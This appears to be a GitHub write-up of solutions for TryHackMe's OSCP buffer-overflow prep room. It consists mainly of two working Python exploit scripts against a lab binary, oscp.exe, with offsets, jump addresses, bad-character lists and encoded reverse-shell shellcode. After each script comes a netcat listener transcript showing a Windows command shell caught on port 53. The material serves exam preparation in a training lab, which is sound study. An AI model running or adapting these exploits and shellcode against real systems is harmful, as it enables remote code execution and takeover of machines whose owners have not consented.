sec-balkan / OSCP_BOF_Prep_THM

Buffer Overflow Prep room of TryHackMe platform



OSCP - BOF - Prep (TryHackMe)

Buffer Overflow preparation room (by Tib3rius) on the TryHackMe platform.


oscp.exe - OVERFLOW1

#!/usr/bin/python
# Python 2 script: it uses print statements and str payloads, so it does not run
# unmodified under Python 3 (where socket.send() requires bytes).
import socket

ip = "<ip>"   # placeholder; no real target is configured in this file
port = 1337

prefix = "OVERFLOW1 "   # literal sent first, ahead of the padding

# offset, jmp and shellcode are hard-coded results of analysis done outside this
# script (see the badchar notes below); nothing here computes or validates them.
offset = 1978
overflow = "A"*offset
jmp = "\xAF\x11\x50\x62"   # 4 bytes placed immediately after the padding

# Opaque byte string: this file shows nothing about what it does, only that it
# is appended after jmp and sent in the same message.
shellcode = ("\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xac\xe5\xca\x95\x83\xee\xfc\xe2\xf4\x50\x0d\x48\x95\xac\xe5"
"\xaa\x1c\x49\xd4\x0a\xf1\x27\xb5\xfa\x1e\xfe\xe9\x41\xc7\xb8"
"\x6e\xb8\xbd\xa3\x52\x80\xb3\x9d\x1a\x66\xa9\xcd\x99\xc8\xb9"
"\x8c\x24\x05\x98\xad\x22\x28\x67\xfe\xb2\x41\xc7\xbc\x6e\x80"
"\xa9\x27\xa9\xdb\xed\x4f\xad\xcb\x44\xfd\x6e\x93\xb5\xad\x36"
"\x41\xdc\xb4\x06\xf0\xdc\x27\xd1\x41\x94\x7a\xd4\x35\x39\x6d"
"\x2a\xc7\x94\x6b\xdd\x2a\xe0\x5a\xe6\xb7\x6d\x97\x98\xee\xe0"
"\x48\xbd\x41\xcd\x88\xe4\x19\xf3\x27\xe9\x81\x1e\xf4\xf9\xcb"
"\x46\x27\xe1\x41\x94\x7c\x6c\x8e\xb1\x88\xbe\x91\xf4\xf5\xbf"
"\x9b\x6a\x4c\xba\x95\xcf\x27\xf7\x21\x18\xf1\x8d\xf9\xa7\xac"
"\xe5\xa2\xe2\xdf\xd7\x95\xc1\xc4\xa9\xbd\xb3\xab\x1a\x1f\x2d"
"\x3c\xe4\xca\x95\x85\x21\x9e\xc5\xc4\xcc\x4a\xfe\xac\x1a\x1f"
"\xc5\xfc\xb5\x9a\xd5\xfc\xa5\x9a\xfd\x46\xea\x15\x75\x53\x30"
"\x5d\xff\xa9\x8d\xc0\x9d\xcd\x27\xa2\x97\xac\xe5\xff\x1c\x4a"
"\x8f\xda\xc3\xfb\x8d\x53\x30\xd8\x84\x35\x40\x29\x25\xbe\x99"
"\x53\xab\xc2\xe0\x40\x8d\x3a\x20\x0e\xb3\x35\x40\xc4\x86\xa7"
"\xf1\xac\x6c\x29\xc2\xfb\xb2\xfb\x63\xc6\xf7\x93\xc3\x4e\x18"
"\xac\x52\xe8\xc1\xf6\x94\xad\x68\x8e\xb1\xbc\x23\xca\xd1\xf8"
"\xb5\x9c\xc3\xfa\xa3\x9c\xdb\xfa\xb3\x99\xc3\xc4\x9c\x06\xaa"
"\x2a\x1a\x1f\x1c\x4c\xab\x9c\xd3\x53\xd5\xa2\x9d\x2b\xf8\xaa"
"\x6a\x79\x5e\x3a\x20\x0e\xb3\xa2\x33\x39\x58\x57\x6a\x79\xd9"
"\xcc\xe9\xa6\x65\x31\x75\xd9\xe0\x71\xd2\xbf\x97\xa5\xff\xac"
"\xb6\x35\x40")

# Badchars of mona: "\x00\x01\x02\x03\x04\x07\x08\x2e\x2f\xa0\xa1"
# Manual guessing Badchars: "\x00\x07\x2e\xa0"

try:
  print "\nSending evil buffer..."

  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

  s.connect((ip, port))
  # Single send(); its return value (the number of bytes actually written) is
  # ignored, so a partial write would go unnoticed.
  s.send(prefix + overflow + jmp + shellcode)

  # close() is only reached on the success path; if anything above raises, the
  # socket is left to be garbage-collected rather than closed explicitly.
  s.close()

  print "\nDone!"

# Bare except: every exception raised in the try body (a connect failure, but
# also any other error, including KeyboardInterrupt) is reported as
# "Could not connect!", which hides the real cause.
except:
  print "\nCould not connect!"
┌──(kali㉿kali)-[~]
└─$ sudo rlwrap nc -lnvp 53                                                                         
[sudo] password for kali: 
listening on [any] 53 ...
connect to [<ip>] from (UNKNOWN) [10.10.25.204] 49250
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>

oscp.exe - OVERFLOW2

#!/usr/bin/python
# Python 2 script: it uses print statements and str payloads, so it does not run
# unmodified under Python 3 (where socket.send() requires bytes).
import socket

ip = "<ip>"   # placeholder; note that connect() below does not use this variable
port = 1337

prefix = "OVERFLOW2 "   # literal sent first, ahead of the padding

# offset, jmp and shellcode are hard-coded results of analysis done outside this
# script (see the badchar note below); nothing here computes or validates them.
offset = 634
overflow = "A"*offset
jmp = "\xAF\x11\x50\x62"   # 4 bytes placed immediately after the padding
nops = "\x90"*16   # 16 bytes inserted between jmp and shellcode (absent in the OVERFLOW1 script)

# Badchars of mona 00 23 24 3c 3d 83 84 ba bb

# Opaque byte string: this file shows nothing about what it does, only that it
# is appended after nops and sent in the same message.
shellcode = ("\x89\xe6\xda\xc0\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x4b\x58\x6b\x32\x65\x50\x45\x50\x63\x30\x35\x30\x4c"
"\x49\x78\x65\x76\x51\x6f\x30\x75\x34\x6c\x4b\x42\x70\x70\x30"
"\x4c\x4b\x30\x52\x54\x4c\x6e\x6b\x73\x62\x74\x54\x4c\x4b\x63"
"\x42\x77\x58\x34\x4f\x6f\x47\x62\x6a\x64\x66\x55\x61\x6b\x4f"
"\x4c\x6c\x47\x4c\x75\x31\x31\x6c\x76\x62\x76\x4c\x35\x70\x79"
"\x51\x68\x4f\x36\x6d\x33\x31\x38\x47\x79\x72\x69\x62\x53\x62"
"\x62\x77\x6e\x6b\x53\x62\x64\x50\x4c\x4b\x61\x5a\x67\x4c\x6c"
"\x4b\x50\x4c\x72\x31\x42\x58\x48\x63\x43\x78\x66\x61\x78\x51"
"\x70\x51\x6e\x6b\x62\x79\x65\x70\x33\x31\x48\x53\x6c\x4b\x63"
"\x79\x66\x78\x48\x63\x34\x7a\x47\x39\x6c\x4b\x77\x44\x6e\x6b"
"\x43\x31\x58\x56\x34\x71\x4b\x4f\x4e\x4c\x6a\x61\x58\x4f\x44"
"\x4d\x35\x51\x6b\x77\x44\x78\x59\x70\x32\x55\x4c\x36\x66\x63"
"\x61\x6d\x58\x78\x75\x6b\x73\x4d\x67\x54\x31\x65\x58\x64\x70"
"\x58\x6c\x4b\x70\x58\x54\x64\x63\x31\x38\x53\x52\x46\x6e\x6b"
"\x46\x6c\x52\x6b\x6e\x6b\x62\x78\x47\x6c\x67\x71\x6a\x73\x4c"
"\x4b\x73\x34\x6e\x6b\x75\x51\x6a\x70\x4b\x39\x43\x74\x77\x54"
"\x44\x64\x73\x6b\x71\x4b\x75\x31\x31\x49\x33\x6a\x66\x31\x79"
"\x6f\x69\x70\x53\x6f\x63\x6f\x51\x4a\x6c\x4b\x52\x32\x48\x6b"
"\x4e\x6d\x53\x6d\x43\x58\x75\x63\x30\x32\x77\x70\x67\x70\x45"
"\x38\x71\x67\x32\x53\x77\x42\x51\x4f\x66\x34\x73\x58\x42\x6c"
"\x33\x47\x61\x36\x55\x57\x69\x6f\x49\x45\x4c\x78\x6e\x70\x43"
"\x31\x57\x70\x63\x30\x51\x39\x5a\x64\x31\x44\x62\x70\x61\x78"
"\x44\x69\x4d\x50\x62\x4b\x33\x30\x79\x6f\x39\x45\x76\x30\x66"
"\x30\x72\x70\x52\x70\x63\x70\x30\x50\x67\x30\x66\x30\x35\x38"
"\x6a\x4a\x64\x4f\x39\x4f\x6b\x50\x4b\x4f\x59\x45\x6f\x67\x51"
"\x7a\x43\x35\x72\x48\x64\x4a\x37\x78\x75\x31\x6f\x32\x51\x78"
"\x35\x52\x45\x50\x45\x50\x50\x35\x6e\x69\x69\x76\x73\x5a\x62"
"\x30\x72\x76\x52\x77\x71\x78\x6c\x59\x6c\x65\x71\x64\x45\x31"
"\x59\x6f\x7a\x75\x6b\x35\x49\x50\x54\x34\x46\x6c\x6b\x4f\x32"
"\x6e\x35\x58\x32\x55\x38\x6c\x61\x78\x7a\x50\x38\x35\x4d\x72"
"\x63\x66\x39\x6f\x6a\x75\x42\x48\x45\x33\x30\x6d\x53\x54\x35"
"\x50\x4b\x39\x4d\x33\x61\x47\x53\x67\x63\x67\x44\x71\x4c\x36"
"\x32\x4a\x76\x72\x52\x79\x70\x56\x4a\x42\x69\x6d\x45\x36\x6f"
"\x37\x61\x54\x64\x64\x47\x4c\x45\x51\x56\x61\x4c\x4d\x37\x34"
"\x57\x54\x46\x70\x79\x56\x65\x50\x50\x44\x51\x44\x72\x70\x71"
"\x46\x76\x36\x53\x66\x73\x76\x76\x36\x42\x6e\x51\x46\x51\x46"
"\x43\x63\x70\x56\x35\x38\x74\x39\x7a\x6c\x37\x4f\x6e\x66\x6b"
"\x4f\x59\x45\x4d\x59\x49\x70\x72\x6e\x76\x36\x42\x66\x49\x6f"
"\x44\x70\x62\x48\x43\x38\x6e\x67\x65\x4d\x53\x50\x69\x6f\x79"
"\x45\x6d\x6b\x58\x70\x68\x35\x4f\x52\x36\x36\x35\x38\x69\x36"
"\x4a\x35\x4f\x4d\x6f\x6d\x79\x6f\x4e\x35\x75\x6c\x36\x66\x71"
"\x6c\x45\x5a\x4f\x70\x79\x6b\x59\x70\x64\x35\x75\x55\x6d\x6b"
"\x72\x67\x54\x53\x72\x52\x52\x4f\x72\x4a\x73\x30\x72\x73\x79"
"\x6f\x38\x55\x41\x41")

try:
  print "\nSending evil buffer..."

  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

  # Connects to the literal placeholder string rather than the ip variable
  # defined above, so editing ip alone has no effect in this script.
  s.connect(("<ip>", port))
  # Single send(); its return value (the number of bytes actually written) is
  # ignored, so a partial write would go unnoticed.
  s.send(prefix + overflow + jmp + nops + shellcode)

  # close() is only reached on the success path; if anything above raises, the
  # socket is left to be garbage-collected rather than closed explicitly.
  s.close()

  print "\nDone!"

# Bare except: every exception raised in the try body (a connect failure, but
# also any other error, including KeyboardInterrupt) is reported as
# "Could not connect!", which hides the real cause.
except:
  print "\nCould not connect!"
┌──(kali㉿kali)-[~]
└─$ sudo rlwrap nc -lnvp 53                                                                         
[sudo] password for kali: 
listening on [any] 53 ...
connect to [<ip>] from (UNKNOWN) [10.10.25.204] 49250
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>
